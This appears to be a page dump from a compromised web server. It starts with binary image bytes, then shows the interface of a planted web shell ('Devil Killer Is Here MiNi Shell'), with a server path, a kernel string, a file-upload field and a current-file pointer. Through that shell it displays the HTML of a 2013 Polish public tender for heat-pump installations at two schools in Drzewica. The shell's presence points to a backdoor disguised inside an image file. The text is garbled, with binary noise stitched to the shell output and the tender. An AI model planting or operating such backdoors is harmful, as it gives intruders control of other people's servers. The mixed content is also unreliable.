JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/57656-N-2013.html

<p class="kh_header"><b>Drzewica: INSTALACJA POMP CIEPŁA I KOLEKTORÓW SŁONECZNYCH NA BUDYNKACH UŻYTECZNOŚCI PUBLICZNEJ W GMINIE DRZEWICA - II ETAP.</b><br>
<b>Numer ogłoszenia: 57656 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Drzewica , ul. Staszica 22, 26-340 Drzewica, woj. łódzkie, tel. 048 3756794, faks 048 3756641.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> INSTALACJA POMP CIEPŁA I KOLEKTORÓW SŁONECZNYCH NA BUDYNKACH UŻYTECZNOŚCI PUBLICZNEJ W GMINIE DRZEWICA - II ETAP..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja inwestycji polegającej na remoncie instalacji centralnego ogrzewania z montażem pomp ciepła w budynkach szkolnych w miejscowościach Brzustowiec i Domaszno. Zamówienie podzielone jest na dwie części.
Część 1: REMONT INSTALACJI CENTRALNEGO OGRZEWANIA Z MONTAŻEM  POMP CIEPŁA W BUDYNKU PUBLICZNEJ SZKOŁY PODSTAWOWEJ W BRZUSTOWCU.

Przedmiotem części I Zamówienia jest wykonanie remontu wewnętrznej instalacji centralnego ogrzewania z wykorzystaniem pomp ciepła dla budynku Szkoły Podstawowej w Brzustowcu, działka nr ewid. 1/3. Zespół budynków szkolnych składa się w dwukondygnacyjnego budynku dydaktycznego, parterowej części socjalnej z kotłownią oraz nowo dobudowanej sali gimnastycznej z zapleczem.
Wskaźniki techniczne:
Parter: Powierzchnia użytkowa 930,5m2. Kubatura 3632,4m3
Piętro: Powierzchnia użytkowa 201,5m2. Kubatura 507,3m3
W obecnym stanie kotłownia wyposażona jest w olejowy kocioł typ Paromat Simplex 105 kW prod. Viessmann zasilany olejem opałowym zgromadzonym w zbiornikach umiejscowionych w magazynie oleju. Kocioł współpracuje z 300 litrowym zasobnikiem c.w.u. typ RudoCell prod. Viessmann. Zabezpieczenie stanowi przeponowe naczynie wzbiorcze Reflex 3bar 320 l.  Kocioł dostarcza ciepło do grzejników płytowych i żeliwnych (szt. 77). Instalacja centralnego ogrzewania wykonana jest z rur stalowych czarnych ze szwem.
Źródłem instalacji centralnego ogrzewania dla remontowanej instalacji będą 2 pompy ciepła pracujące w układzie kaskadowym o łącznej mocy 85,6 kW i istniejącego kotła, obiegiem pierwotnym będzie instalacja pomp ciepła z 21 pionowymi sondami gruntowymi o głębokości 100 mb każda. Rozdział na poszczególne odwierty nastąpi z 3 studni polietylenowych z kolektorami wielosekcyjnymi. W ramach remontu wymieniona zostanie instalacja wraz z grzejnikami które zastąpione zostaną grzejnikami płytowymi wyposażonymi w głowice termostatyczne. 

Część 2: REMONT INSTALACJI CENTRALNEGO OGRZEWANIA Z MONTAŻEM  POMP CIEPŁA W BUDYNKU PUBLICZNEJ SZKOŁY PODSTAWOWEJ W DOMASZNIE.

Przedmiotem części I Zamówienia jest wykonanie remontu wewnętrznej instalacji centralnego ogrzewania z wykorzystaniem pomp ciepła dla budynku Szkoły Podstawowej w Domasznie, działki nr ewid. 1606/1, 1615, 1616/1 i 1617/1. Budynek  szkoły jest obiektem dwukondygnacyjnym częściowo podpiwniczonym w którym oprócz szkoły znajdują się pomieszczenia mieszkalne.
Powierzchnia zabudowy budynku wynosi 746,6m2, natomiast kubatura 7092,7 m3.
W obecnym stanie kotłownia wyposażona jest w olejowy kocioł typ Paromat Simplex 105 kW prod. Viessmann zasilany olejem opałowym zgromadzonym w zbiornikach umiejscowionych w magazynie oleju. Kocioł współpracuje z 300 litrowym zasobnikiem c.w.u. typ RudoCell prod. Viessmann. Zabezpieczenie stanowi przeponowe naczynie wzbiorcze Reflex 3bar 320 l.  Kocioł dostarcza ciepło do grzejników żeliwnych (szt. 75). Instalacja centralnego ogrzewania wykonana jest z rur stalowych czarnych ze szwem.
Projekt obejmuje wymianę istniejącej instalacji centralnego ogrzewania i istniejących grzejników żeliwnych. Nowo wykonana instalacja  centralnego ogrzewania zasilana będzie z  projektowaną kaskadą 2 pomp ciepła  o łącznej mocy 85,6 kW, obiegiem pierwotnym będzie instalacja pomp ciepła z 21 pionowymi sondami gruntowymi o głębokości 100 mb każda. Rozdział na poszczególne odwierty nastąpi z 3 studni polietylenowych z kolektorami wielosekcyjnymi. W ramach remontu wymieniona zostanie instalacja wraz z grzejnikami które zastąpione zostaną grzejnikami płytowymi wyposażonymi w głowice termostatyczne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.10.00-0, 45.33.22.00-5, 45.12.10.00-1, 45.33.00.00-9, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część 1 :  20 000 PLN  (słownie: dwadzieścia tysięcy złotych).
Część 2 :  20 000 PLN  (słownie: dwadzieścia tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie :
wykonał dwie roboty budowlane o wartości  1.000.000 zl każda  polegające na budowie, dostawie i montażu instalacji pomp ciepła o mocy nie mniejszej niż w powyższym zadaniu, wraz z dolnym źródłem ciepła w postaci pionowych sond gruntowych w każdym z tych zadań. Jednocześnie zamawiający wymaga, aby na co najmniej jednej z wymienionych wyżej robót Wykonawca wykonał wewnętrzną instalacje centralnego ogrzewania tj. należy udokumentować iż co najmniej jedno zadanie polegało na kompleksowym wykonaniu instalacji grzewczej z pompami ciepła, dolnym źródłem i wewnętrzna instalacją c.o. tak jak w przedmiotowym zamówieniu. Ocena spełnienia przedstawionych warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ekspert 1 - kierownik budowy - posiadający:
-co najmniej 5 letnie doświadczenie na stanowisku kierownika budowy,
-uprawnienia bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych i gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów. 

Ekspert 2 - kierownik robót elektrycznych - posiadający:
-uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów. 
Ocena spełnienia przedstawionych warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż  1.000.000 PLN; (oddzielnie dla każdego zadania).
-posiada opłaconą polisę OC w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1.000.000 PLN. 
Ocena spełnienia przedstawionych warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.
2.	Zmiana umowy może nastąpić jedynie w wypadkach określonych w niniejszej umowie.
3.	Zmian w zakresie wysokości wynagrodzenia można dokonać w wypadku:
a.	zmiany umowy poprzez ograniczenie jej zakresu przedmiotowego; w tym wypadku wynagrodzenie ulega zmniejszeniu o wartość kosztorysową  obliczona według kosztorysu powykonawczego sporządzonego według tych samych stawek i założeń , jakie były podstawą do ustalenia wynagrodzenia kosztorysowego ofertowego prac, które zostały wyłączone;
4.	Zmiany terminu realizacji umowy można dokonać w wypadku:
a.	Z powodu warunków atmosferycznych nie jest możliwe prowadzenie prac - o czas w jakim wyłączone jest prowadzenie tych prac;
b.	Wstrzymanie realizacji prac z przyczyn niezależnych od Wykonawcy i osób, z pomocą których realizuje niniejszą umowę;
c.	Siły wyższej;
5.	Innej zmiany umowy wynikającej ze zmiany umowy z jednostką dofinansowującą, zmiany zasad dofinansowania bądź obowiązków stron w związku z zasadami dofinansowania.
6.	Podstawą do zmiany umowy będzie pisemny wniosek zawierający uzasadnienie zatwierdzony przez Inspektora Nadzoru.
7.	Zmiana stawki podatku od towarów i usług VAT stanowi podstawę do zmiany wynagrodzenia określonego niniejszą umową o wartość stanowiącą konsekwencję dokonanej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.drzewica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Drzewicy
ul. Staszica 22
26-340 Drzewica
pokój nr 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2013 godzina 12:00, miejsce: Urząd Gminy i Miasta w Drzewicy
ul. Staszica 22
26-340 Drzewica
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach projektu Instalacja pomp ciepła i kolektorów słonecznych na budynkach użyteczności publicznej w Gminie Drzewica na podstawie umowy o przyznanie pomocy Nr 00192-6921-UM0501834/11 w związku z realizacją operacji w ramach Programu oś 3, :Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej, działanie 321 Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1: REMONT INSTALACJI CENTRALNEGO OGRZEWANIA Z MONTAŻEM  POMP CIEPŁA W BUDYNKU PUBLICZNEJ SZKOŁY PODSTAWOWEJ W BRZUSTOWCU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części I Zamówienia jest wykonanie remontu wewnętrznej instalacji centralnego ogrzewania z wykorzystaniem pomp ciepła dla budynku Szkoły Podstawowej w Brzustowcu, działka nr ewid. 1/3. Zespół budynków szkolnych składa się w dwukondygnacyjnego budynku dydaktycznego, parterowej części socjalnej z kotłownią oraz nowo dobudowanej sali gimnastycznej z zapleczem.
Wskaźniki techniczne:
Parter: Powierzchnia użytkowa 930,5m2. Kubatura 3632,4m3
Piętro: Powierzchnia użytkowa 201,5m2. Kubatura 507,3m3
W obecnym stanie kotłownia wyposażona jest w olejowy kocioł typ Paromat Simplex 105 kW prod. Viessmann zasilany olejem opałowym zgromadzonym w zbiornikach umiejscowionych w magazynie oleju. Kocioł współpracuje z 300 litrowym zasobnikiem c.w.u. typ RudoCell prod. Viessmann. Zabezpieczenie stanowi przeponowe naczynie wzbiorcze Reflex 3bar 320 l.  Kocioł dostarcza ciepło do grzejników płytowych i żeliwnych (szt. 77). Instalacja centralnego ogrzewania wykonana jest z rur stalowych czarnych ze szwem.
Źródłem instalacji centralnego ogrzewania dla remontowanej instalacji będą 2 pompy ciepła pracujące w układzie kaskadowym o łącznej mocy 85,6 kW i istniejącego kotła, obiegiem pierwotnym będzie instalacja pomp ciepła z 21 pionowymi sondami gruntowymi o głębokości 100 mb każda. Rozdział na poszczególne odwierty nastąpi z 3 studni polietylenowych z kolektorami wielosekcyjnymi. W ramach remontu wymieniona zostanie instalacja wraz z grzejnikami które zastąpione zostaną grzejnikami płytowymi wyposażonymi w głowice termostatyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.10.00-0, 45.33.22.00-5, 45.12.10.00-9, 45.40.00.00-1, 45.12.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2: REMONT INSTALACJI CENTRALNEGO OGRZEWANIA Z MONTAŻEM  POMP CIEPŁA W BUDYNKU PUBLICZNEJ SZKOŁY PODSTAWOWEJ W DOMASZNIE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części I Zamówienia jest wykonanie remontu wewnętrznej instalacji centralnego ogrzewania z wykorzystaniem pomp ciepła dla budynku Szkoły Podstawowej w Domasznie, działki nr ewid. 1606/1, 1615, 1616/1 i 1617/1. Budynek  szkoły jest obiektem dwukondygnacyjnym częściowo podpiwniczonym w którym oprócz szkoły znajdują się pomieszczenia mieszkalne.
Powierzchnia zabudowy budynku wynosi 746,6m2, natomiast kubatura 7092,7 m3.
W obecnym stanie kotłownia wyposażona jest w olejowy kocioł typ Paromat Simplex 105 kW prod. Viessmann zasilany olejem opałowym zgromadzonym w zbiornikach umiejscowionych w magazynie oleju. Kocioł współpracuje z 300 litrowym zasobnikiem c.w.u. typ RudoCell prod. Viessmann. Zabezpieczenie stanowi przeponowe naczynie wzbiorcze Reflex 3bar 320 l.  Kocioł dostarcza ciepło do grzejników żeliwnych (szt. 75). Instalacja centralnego ogrzewania wykonana jest z rur stalowych czarnych ze szwem.
